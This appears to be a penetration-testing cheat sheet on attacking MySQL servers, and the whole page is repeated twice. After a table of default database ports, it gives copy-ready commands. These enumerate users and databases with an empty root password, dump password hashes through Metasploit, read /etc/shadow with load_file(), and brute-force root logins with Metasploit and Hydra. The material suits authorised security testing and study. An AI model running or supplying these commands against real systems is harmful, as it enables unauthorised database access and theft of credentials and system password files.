SQL

Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.

Relational databases default ports

Database

Port(s)

Doc

MaxDB

7210

MySQL

3306

Oracle DB

1521, 1830

PostgreSQL

5432

SQL Server (MSSQL)

1433, 1434

NoSQL databases and other data stores default ports

Database

Port(s)

Doc

Cassandra

7000, 7001, 9042

CouchDB

5984

Elasticsearch

9200, 9300

MongoDB

27017, 27018, 27019, 28017

Neo4J

7473, 7474

Redis

6379

Enum

# Default scan
nmap $IP -sV -p 3306 

# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password

# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info

# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"

# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"

# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"

# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"

# Try to connect directly without a password
mysql -h $IP -u root

# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"

# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run

## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump 
setg rhosts $IP
set username root
set password ""
run

Manipulate local files via db

# connect to instance
mysql -h $IP -u root

# read local file
select load_file("/etc/shadow");

Bruteforce

# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run

# Hydra
hydra -l root -P  /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql

PreviousApache NextVulnerability Assessment

Last updated 2 years ago

SQL

Structured Query Language (SQL) is a standardized programming language that is used to manage relational databases and perform various operations on the data in them.

Relational databases default ports

Database

Port(s)

Doc

MaxDB

7210

MySQL

3306

Oracle DB

1521, 1830

PostgreSQL

5432

SQL Server (MSSQL)

1433, 1434

NoSQL databases and other data stores default ports

Database

Port(s)

Doc

Cassandra

7000, 7001, 9042

CouchDB

5984

Elasticsearch

9200, 9300

MongoDB

27017, 27018, 27019, 28017

Neo4J

7473, 7474

Redis

6379

Enum

# Default scan
nmap $IP -sV -p 3306 

# Empty password script
nmap $IP -sV -p 3306 --script=mysql-empty-password

# Get Mysql info
nmap $IP -sV -p 3306 --script=mysql-info

# Get mysql users
nmap $IP -sV -p 3306 --script=mysql-users --script-args="mysqluser='root',mysqlpass=''"

# Get mysql databases
nmap $IP -sV -p 3306 --script=mysql-databases --script-args="mysqluser='root',mysqlpass=''"

# Get mysql variables
nmap $IP -sV -p 3306 --script=mysql-variables --script-args="mysqluser='root',mysqlpass=''"

# mysql audit
nmap $IP -sV -p 3306 --script=mysql-audit --script-args="mysql-audit.username='root',mysql-audit.password='',mysql-audit.filename='/usr/share/nmap/nselib/data/mysql-cis.audit'"

# Try to connect directly without a password
mysql -h $IP -u root

# Run query
nmap $IP -sV -p 3306 --script=mysql-query --script-args="query='select count(*) from books.authors;',mysqluser='root',mysqlpass=''"

# Metasploit way
msfconsole
set dir_list /usr/share/metasploit-framework/data/wordlists/directory.txt
setg rhosts $IP
set verbose false
run

## Hashdump
msfconsole
use auxiliary/scanner/mysql/mysql_hashdump 
setg rhosts $IP
set username root
set password ""
run

Manipulate local files via db

# connect to instance
mysql -h $IP -u root

# read local file
select load_file("/etc/shadow");

Bruteforce

# Metasploit way
msfconsole
use auxiliary/scanner/mysql/mysql_login
setg rhosts $IP
set verbose false
set stop_on_success true
set pass_file /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt
set username root
run

# Hydra
hydra -l root -P  /usr/share/metasploit-framework/data/wordlists/unix_passwords.txt $IP mysql

PreviousApache NextVulnerability Assessment

Last updated 2 years ago